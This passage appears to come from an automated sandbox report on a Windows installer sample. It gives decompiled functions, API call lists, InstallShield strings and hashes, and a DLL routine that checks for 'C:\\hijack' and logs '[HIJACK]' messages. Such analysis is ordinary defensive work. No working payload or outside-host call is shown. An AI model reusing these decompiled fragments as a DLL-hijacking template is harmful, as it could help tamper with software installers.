                                                                                                                                                                          • Instruction Fuzzy Hash: A3F0BD75B40208BBEB14DFD4DD95F9EB7B8EB48700F20C148FA18AB280D675AA059B64
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001F1C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001F1C0() {
				int _t1;

				_t1 = PathFileExistsA("C:\\hijack"); // executed
				return _t1;
			}




                                                                                                                                                                          0x1001f1c8
                                                                                                                                                                          0x1001f1cf

                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFileExistsA.KERNELBASE(C:\hijack,?,1001F1E2,?,100227A9,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F1C8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                          • String ID: C:\hijack
                                                                                                                                                                          • API String ID: 1174141254-148195797
                                                                                                                                                                          • Opcode ID: 14122fe3a97c240cae0ebc801744e2228d29e9584bc9b60296d3da73ca953798
                                                                                                                                                                          • Instruction ID: cbcd4ec5042ff81f7f552497cc273b56006d66024910556231888f1c34088e01
                                                                                                                                                                          • Opcode Fuzzy Hash: 14122fe3a97c240cae0ebc801744e2228d29e9584bc9b60296d3da73ca953798
                                                                                                                                                                          • Instruction Fuzzy Hash: 71A022300C020CB3800023CABC0C8E0BB0CC8888333800000FA0E000008B23202000AA
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001F1D0, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001F1D0(void* __edi, intOrPtr _a4, char _a8) {
				char* _v8;
				char _v70491;
				char _v70492;
				void* _t12;
				void* _t16;

				E10018AA0(0x11358); // executed
				_t12 = E1001F1C0(); // executed
				if(_t12 != 0) {
					_v70492 = 0;
					E1000CF20(__edi,  &_v70491, 0, 0x1134f);
					_v8 =  &_a8;
					_t16 = E10001D10( &_v70492, 0x1134f, _a4, _v8);
					_v8 = 0;
					OutputDebugStringA( &_v70492);
					return _t16;
				}
				return _t12;
			}








                                                                                                                                                                          0x1001f1d8
                                                                                                                                                                          0x1001f1dd
                                                                                                                                                                          0x1001f1e4
                                                                                                                                                                          0x1001f1e6
                                                                                                                                                                          0x1001f1fb
                                                                                                                                                                          0x1001f206
                                                                                                                                                                          0x1001f21d
                                                                                                                                                                          0x1001f225
                                                                                                                                                                          0x1001f233
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001f233
                                                                                                                                                                          0x1001f23c

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 1001F1C0: PathFileExistsA.KERNELBASE(C:\hijack,?,1001F1E2,?,100227A9,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F1C8
                                                                                                                                                                          • _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                                            • Part of subcall function 10001D10: __vsnprintf_s.LIBCMT ref: 10001D27
                                                                                                                                                                          • OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DebugExistsFileOutputPathString__vsnprintf_s_memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3726070730-0
                                                                                                                                                                          • Opcode ID: 2524b0902bb6863752e16d8784e8157a0219e7e2b3e8697a48ef5fbb85983224
                                                                                                                                                                          • Instruction ID: d1c4eaeef2fe96386540b73fb7cae86f07877a9616b03c9c3f3d83701942bdc8
                                                                                                                                                                          • Opcode Fuzzy Hash: 2524b0902bb6863752e16d8784e8157a0219e7e2b3e8697a48ef5fbb85983224
                                                                                                                                                                          • Instruction Fuzzy Hash: DDF09079900348B7DB48DBE5DC46FE9B37EDB04A00F5440C9FA1897649EA70F7848BA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1000F7BF, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1000F7BF(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10333310 = _t6;
				if(_t6 != 0) {
					_t7 = E1000F764(__eflags);
					__eflags = _t7 - 3;
					 *0x10335f3c = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000FA34(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10333310);
							 *0x10333310 =  *0x10333310 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                                                                          0x1000f7d0
                                                                                                                                                                          0x1000f7d8
                                                                                                                                                                          0x1000f7dd
                                                                                                                                                                          0x1000f7e2
                                                                                                                                                                          0x1000f7e7
                                                                                                                                                                          0x1000f7ea
                                                                                                                                                                          0x1000f7ef
                                                                                                                                                                          0x1000f815
                                                                                                                                                                          0x1000f817
                                                                                                                                                                          0x1000f818
                                                                                                                                                                          0x1000f7f1
                                                                                                                                                                          0x1000f7f6
                                                                                                                                                                          0x1000f7fb
                                                                                                                                                                          0x1000f7fe
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000f800
                                                                                                                                                                          0x1000f806
                                                                                                                                                                          0x1000f80c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000f80c
                                                                                                                                                                          0x1000f7fe
                                                                                                                                                                          0x1000f7df
                                                                                                                                                                          0x1000f7df
                                                                                                                                                                          0x1000f7e1
                                                                                                                                                                          0x1000f7e1

                                                                                                                                                                          APIs
                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
                                                                                                                                                                          • HeapDestroy.KERNEL32 ref: 1000F806
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$CreateDestroy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3296620671-0
                                                                                                                                                                          • Opcode ID: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                                          • Instruction ID: 42b5b4e525c6d5e648315bcb041ba63a368b68b04be7829f407a1d363953a1d4
                                                                                                                                                                          • Opcode Fuzzy Hash: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                                          • Instruction Fuzzy Hash: 6FE06D74A14352AAF700EB318C897A936ECFB807D6F20C83DF408C84AAFF648501AA01
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00446F60, Relevance: 1.6, APIs: 1, Instructions: 113libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00446FC7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                          • Opcode ID: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
                                                                                                                                                                          • Instruction ID: dbdacd071930a5e86aa0c68e9f9425c322d557eaebe8e7e713bb5428c2ef9a07
                                                                                                                                                                          • Opcode Fuzzy Hash: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
                                                                                                                                                                          • Instruction Fuzzy Hash: B351C774E0520ADFDB04CF88C890BAEB7B2FF88304F248559D515AB391C335A986CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001A348, Relevance: 1.5, APIs: 1, Instructions: 8registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001A348() {
				intOrPtr _t4;
				void* _t6;

				RegCloseKey( *(_t6 - 4)); // executed
				_t4 =  *((intOrPtr*)(_t6 - 8));
				return _t4;
			}





                                                                                                                                                                          0x1001a355
                                                                                                                                                                          0x1001a35b
                                                                                                                                                                          0x1001a361

                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCloseKey.KERNELBASE(00000000), ref: 1001A355
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                          • Opcode ID: d2df109e2e3a954468d9a82ee657232a079eb237185f4a8d45fe512a1c1b322a
                                                                                                                                                                          • Instruction ID: 4111118035c4145df5d6207d544e668d3b67a138326457bd21328434b6feecb4
                                                                                                                                                                          • Opcode Fuzzy Hash: d2df109e2e3a954468d9a82ee657232a079eb237185f4a8d45fe512a1c1b322a
                                                                                                                                                                          • Instruction Fuzzy Hash: 0BB09239A00208ABCB28DB94D99896CBBB4EB49211B2002C8FD1957300CA32DE909B50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 100196B0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E100196B0() {
				intOrPtr _t2;

				EnumWindows(E100193D0, 0);
				_t2 =  *0x10333dcc; // 0x0
				return _t2;
			}




                                                                                                                                                                          0x100196ba
                                                                                                                                                                          0x100196c0
                                                                                                                                                                          0x100196c6

                                                                                                                                                                          APIs
                                                                                                                                                                          • EnumWindows.USER32(100193D0,00000000), ref: 100196BA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnumWindows
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1129996299-0
                                                                                                                                                                          • Opcode ID: 77b17112a631a8c199090b994af9cf4bc8f4f79ff00ce9b4e913f7e21da1a7ac
                                                                                                                                                                          • Instruction ID: 322803dc277e48624d363f96edb163e9ed7c0b181a64caac93bb68219832c0f6
                                                                                                                                                                          • Opcode Fuzzy Hash: 77b17112a631a8c199090b994af9cf4bc8f4f79ff00ce9b4e913f7e21da1a7ac
                                                                                                                                                                          • Instruction Fuzzy Hash: 36B09230240219A7D20097859C8AB40B7ACE344A54F508001F6085B6928AA1A4118555
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1000EBD1, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                          			E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t13;

				E10015254();
				_push(_a4);
				_t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
				return _t5;
			}





                                                                                                                                                                          0x1000ebd1
                                                                                                                                                                          0x1000ebd6
                                                                                                                                                                          0x1000ebe2
                                                                                                                                                                          0x1000ebe8

                                                                                                                                                                          APIs
                                                                                                                                                                          • ___security_init_cookie.LIBCMT ref: 1000EBD1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ___security_init_cookie
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3657697845-0
                                                                                                                                                                          • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                                          • Instruction ID: df3c7268351b8d96a0cbb6988288c15aabcc851e0dc57428b4f822f300cb22e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                                          • Instruction Fuzzy Hash: 9DB0483A208280AB9204CA10D84180EB3A2EBD9211F24C91DF4A61AA558B31AC64EA52
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 0043ACD1, Relevance: 143.8, APIs: 34, Strings: 47, Instructions: 2026stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00411344: __EH_prolog3.LIBCMT ref: 0041134B
                                                                                                                                                                            • Part of subcall function 00411D8B: __EH_prolog3_GS.LIBCMT ref: 00411D95
                                                                                                                                                                            • Part of subcall function 00411D8B: SysStringLen.OLEAUT32(?), ref: 00411EBB
                                                                                                                                                                            • Part of subcall function 00411D8B: SysFreeString.OLEAUT32(?), ref: 00411ECA
                                                                                                                                                                          • GetCommandLineW.KERNEL32(?,runfromtemp,00000000,00000001,00000001,?,CC858012,?,?,?,?,0046EDAD,000000FF), ref: 0043AD4E
                                                                                                                                                                          • CommandLineToArgvW.SHELL32(00000000,?,?,?,?,0046EDAD,000000FF), ref: 0043AD55
                                                                                                                                                                          • lstrlenW.KERNEL32(00000000,runprerequisites,00000000,00000000,00000000,?), ref: 0043AE67
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0043AE9B
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,00000104,?), ref: 0043AF2A
                                                                                                                                                                          • _memset.LIBCMT ref: 0043AFA4
                                                                                                                                                                          • CoUninitialize.OLE32(00000000,Running after reboot,?,00000001,Setup.cpp,?,00000001,reboot,00000000,00000000,00000000,?,?,00000000,?,?), ref: 0043B242
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 0041A194: __EH_prolog3_GS.LIBCMT ref: 0041A19E
                                                                                                                                                                            • Part of subcall function 0041A194: GetProcAddress.KERNEL32(?,RunISMSISetup), ref: 0041A1B0
                                                                                                                                                                            • Part of subcall function 00419082: __EH_prolog3.LIBCMT ref: 00419089
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 004393E3: __EH_prolog3.LIBCMT ref: 004393EA
                                                                                                                                                                          • CoUninitialize.OLE32(?,?,00000001,?,00000000,Running after reboot,?,00000001,Setup.cpp,?,00000001,reboot,00000000,00000000,00000000), ref: 0043B2BC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastString$FreeH_prolog3$CommandH_prolog3_LineUninitialize$AddressArgvFileInitializeModuleNameProc_memsetlstrlen
                                                                                                                                                                          • String ID: /IS_temp$ /debuglog$ /eprq$%s %s$%s /q"%s" /tempdisk1folder"%s" %s$%s%s$%s\%.04ld.mst$%s\%s.ini$0$>$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$ISSetup.dll$ISSetup.dll$InstallShield setup.exe (Unicode) started, cmdline: %s$Languages$Relaunching setup from temp$Running after reboot$Running as remove major upgrade$Setup returning %d$Setup.cpp$Skin$StartUp$Startup$Supported$WaitInstallation$clone_wait$debuglog$eprq$k$reboot$removeasmajorupgrade$runfromtemp$runprerequisites$setup.isn$tempdisk1folder
                                                                                                                                                                          • API String ID: 1421209910-599718284
                                                                                                                                                                          • Opcode ID: 1572c2a11dc52907bc31d20f1a4e6b8811222394388ba9cf3f0c9a87b7e51445
                                                                                                                                                                          • Instruction ID: fd9a5758f8468140bf351392692f581eaac9445e1b4ce6b3223bf273c2e4f7a1
                                                                                                                                                                          • Opcode Fuzzy Hash: 1572c2a11dc52907bc31d20f1a4e6b8811222394388ba9cf3f0c9a87b7e51445
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F136B70801259EEDB20EB64CD45BEEBBB4AB15304F1440EAE049771D2DB785F88DF9A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0044B6B4, Relevance: 62.6, APIs: 34, Strings: 1, Instructions: 1365COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044B740
                                                                                                                                                                          • __whiteout.LIBCMT ref: 0044B7AB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Locale$UpdateUpdate::___whiteout
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 1169095537-1018135373
                                                                                                                                                                          • Opcode ID: 0463eb4149e85461c20159164877cd956fb3c9f4d4e83af6858eca763e99bad1
                                                                                                                                                                          • Instruction ID: 3dba4924be6a993b4a641ef19a549ad5899ed85bd786f74f922f2a3754a98d06
                                                                                                                                                                          • Opcode Fuzzy Hash: 0463eb4149e85461c20159164877cd956fb3c9f4d4e83af6858eca763e99bad1
                                                                                                                                                                          • Instruction Fuzzy Hash: A8B28071D062698BEB759B14CC98BADB7B4EB44310F1840EBE449A7391DB389EC1CF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00422751, Relevance: 57.2, APIs: 7, Strings: 25, Instructions: 1181windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0042275B
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00436D0C: __EH_prolog3_GS.LIBCMT ref: 00436D13
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000001), ref: 00422A61
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString$H_prolog3_H_prolog3_catch_MessageSend
                                                                                                                                                                          • String ID: 2$Attempting to get MSI 3.0 redist instead$Attempting to get file '%s' for MSI engine install$Delaying redist reboot...$Failed to get file$Got file '%s' for MSI engine install$HsG$HsG$HsG$InstallSource$MSI 3.1 needs to be installed, but is not available$MSI 3.1 to be installed, was not installed with redist package$PackageCode$PackageName$Reboot needed: %s$Reboot not suppressed, SuppressReboot not set and MSI installed$Reboot not suppressed, SuppressReboot set to N$Startup$SuppressReboot$SuppressReboot set to Yes or MSI not being installed, suppressing reboot$WindowsInstaller-KB893803-x86.exe$f$instmsi30.exe$msiaction.cpp$yes
                                                                                                                                                                          • API String ID: 527295363-1874067674
                                                                                                                                                                          • Opcode ID: 99f3ee89e516763c5121620028174a8b09e0af45d7c7a8f1f554f7a8bad88cdd
                                                                                                                                                                          • Instruction ID: 24e58ee780e9344a22a2738be6f1a6691420d3221cabd7aab80342c954391693
                                                                                                                                                                          • Opcode Fuzzy Hash: 99f3ee89e516763c5121620028174a8b09e0af45d7c7a8f1f554f7a8bad88cdd
                                                                                                                                                                          • Instruction Fuzzy Hash: A3B29270A01268EEDF21DB64CD55BEE77B8AB15304F4040EAE049B7192DB785F88CF5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043997A, Relevance: 27.2, APIs: 18, Instructions: 224COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00439984
                                                                                                                                                                          • _memset.LIBCMT ref: 004399B3
                                                                                                                                                                          • _memset.LIBCMT ref: 004399D0
                                                                                                                                                                          • _memset.LIBCMT ref: 004399EA
                                                                                                                                                                          • _memset.LIBCMT ref: 00439A04
                                                                                                                                                                          • _memset.LIBCMT ref: 00439A1E
                                                                                                                                                                          • _memset.LIBCMT ref: 00439A38
